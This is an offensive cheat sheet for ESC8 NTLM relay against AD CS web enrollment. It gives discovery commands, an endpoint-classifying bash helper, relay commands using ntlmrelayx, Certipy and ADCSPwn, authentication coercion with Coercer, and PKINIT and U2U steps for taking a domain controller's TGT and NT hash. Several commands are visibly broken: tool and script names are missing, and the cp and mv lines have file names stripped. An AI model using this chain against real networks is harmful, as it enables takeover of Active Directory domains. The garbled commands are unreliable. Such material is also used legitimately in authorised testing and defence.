NTLM Relay to AD CS HTTP Endpoints


Discover Certificate Enrollment Web Service (CES) endpoints with certutil (the CA Web Enrollment role lives at /certsrv and is checked separately below; both are NTLM relay targets when they accept NTLM over HTTP):

Cmd > certutil.exe -enrollmentServerURL -config CA01.megacorp.local\CA01

Discover CES endpoints with PowerShell (PSPKI module):

PS > Get-CertificationAuthority | select name,enroll* | fl

Check a list of CA hosts for the Web Enrollment endpoint. A 401 (authentication demanded) or a 200 (the supplied credentials were accepted) means /certsrv is present; a 404 means the host does not run the Web Enrollment role. The status code is matched on the status line only, so a header such as `Content-Length: 2001` cannot produce a false positive:

$ for ip in `cat ~/ws/discover/hosts/ca.txt`; do curl -sSLkI -u 'MEGACORP\snovvcrash:Passw0rd!' --ntlm http://$ip/certsrv/certfnsh.asp | grep -E '^HTTP/[0-9.]+ (401|200)' > /dev/null && echo "[+] $ip" || echo "[-] $ip"; done
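The loop above only tells you whether /certsrv answers. What actually makes the endpoint relayable is that it challenges with NTLM (or Negotiate) over plain HTTP, where no TLS channel binding can protect it; over HTTPS the headers alone cannot tell you whether Extended Protection for Authentication (EPA) is enforced. The following shell helper is an added example, not part of the original notes or of any of the tools above: it probes both schemes without credentials (the 401 challenge is visible unauthenticated) and classifies the response. The host list path, the output tokens and the sample headers in the comments are my own assumptions.

```bash
#!/usr/bin/env bash
# Added example: classify a CA Web Enrollment (/certsrv) response for ESC8 relay
# suitability. classify_certsrv is pure (it parses captured HTTP headers) so it
# can be checked offline; probe_certsrv wraps curl for real use.
# Assumptions: the path /certsrv/certfnsh.asp as on the page; the output tokens
# below are my own naming, not anything the tools print.

# classify_certsrv <scheme> <response-headers>
# Prints one token:
#   relayable   401 with an NTLM/Negotiate challenge over plain http (ESC8 precondition)
#   https-ntlm  401 with NTLM/Negotiate over https: relay works only if EPA is off,
#               which the headers cannot tell you, so try it with an https target
#   no-ntlm     401 but no NTLM/Negotiate challenge (e.g. Basic only): nothing to relay
#   open        200 without authentication: not a relay target, but inspect it
#   absent      404, connection failure or anything else: no Web Enrollment here
classify_certsrv() {
    local scheme="$1"
    local headers="$2"
    local status
    local ntlm=0
    # Take the LAST status line: curl -L (or a 302 to /certsrv/) can emit several.
    status=$(printf '%s\n' "$headers" \
        | grep -Ei '^HTTP/[0-9.]+ [0-9]{3}' | tail -n 1 | awk '{print $2}')
    # IIS sends "WWW-Authenticate: Negotiate" and "WWW-Authenticate: NTLM" as
    # separate header lines; either one means NTLM will be accepted.
    if printf '%s\n' "$headers" | grep -Eiq '^WWW-Authenticate: *(NTLM|Negotiate)'; then
        ntlm=1
    fi
    case "$status" in
        401)
            if [ "$ntlm" -eq 1 ]; then
                if [ "$scheme" = "http" ]; then echo relayable; else echo https-ntlm; fi
            else
                echo no-ntlm
            fi
            ;;
        200) echo open ;;
        *)   echo absent ;;
    esac
}

# probe_certsrv <host>: probe http and https without credentials and print a
# one-line verdict per scheme. -k ignores the CA's own TLS cert, -m caps the wait.
probe_certsrv() {
    local host="$1"
    local scheme
    local hdrs
    for scheme in http https; do
        hdrs=$(curl -sSkI -m 10 "$scheme://$host/certsrv/certfnsh.asp" 2>/dev/null) || hdrs=""
        printf '%-6s %-32s %s\n' "$scheme" "$host" "$(classify_certsrv "$scheme" "$hdrs")"
    done
}

# probe_list <file>: one host per line, blank lines ignored.
# Usage (assumed host list path): probe_list ~/ws/discover/hosts/ca.txt
probe_list() {
    local host
    while IFS= read -r host; do
        [ -n "$host" ] && probe_certsrv "$host"
    done < "$1"
}
```

Treat `relayable` as a go for `ntlmrelayx`/Certipy with an `http://` target; for `https-ntlm`, point the relay at the `https://` URL and let the relay itself tell you whether EPA blocks it. `open` can also appear if you already hold a Kerberos ticket in a browser session, which is why the probe sends no credentials.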



$ -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --adcs [--template VulnTemplate] --no-http-server --no-wcf-server --no-raw-server
$ python3 -d '' -u '' -p ''
PS > .\Rubeus.exe asktgt /user:DC1$ /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt


Back up the original attack module and copy over the one from the toolkit, with the domain name adjusted and, if needed, a different template (DomainController is the default; KerberosAuthentication also works for a DC, since both carry the Client Authentication EKU and the machine's DNS name that PKINIT needs):

$ sudo cp /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/ /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/
$ subl ntlmrelayx/
$ sudo cp ntlmrelayx/ /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/

Perform the relay attack, then use the obtained certificate and key to request a TGT via PKINIT and recover the machine account's NT hash with the Kerberos U2U extension (the `-key` value in the last step is the AS-REP encryption key printed by the PKINIT step):

$ -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --no-http-server --no-wcf-server --no-raw-server
$ python3 -d '' -u '' -p ''
$ python3 megacorp.local/'DC1$' -cert-pem cert.pem -key-pem privatekey.pem dc1.ccache
$ KRB5CCNAME=dc1.ccache python3 megacorp.local/'DC1$' -key 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff

Revert to the original module:

$ sudo mv /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/ /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/


Start the relay with Certipy (it listens for incoming NTLM authentication and requests a certificate from the given template on the victim's behalf):

$ certipy relay -ca -template DomainController


Start a relay server on Windows with ADCSPwn (it coerces the target's authentication itself and relays it to the CA's web enrollment):

PS > .\ADCSPwn.exe --adcs CA01.megacorp.local

Coerce the authentication, e.g. via Coercer (`-t` is the machine whose account you want a certificate for, `-l` is the attacker's listener). HTTP-sourced coercion requires the WebClient service to be running on the victim; SMB-sourced authentication can also be relayed to the HTTP enrollment endpoint, so `--auth-type smb` is the fallback when WebClient is not running:

$ coercer coerce -u snovvcrash -p 'Passw0rd!' -t -l VICTIM01 --auth-type http --http-port 8080
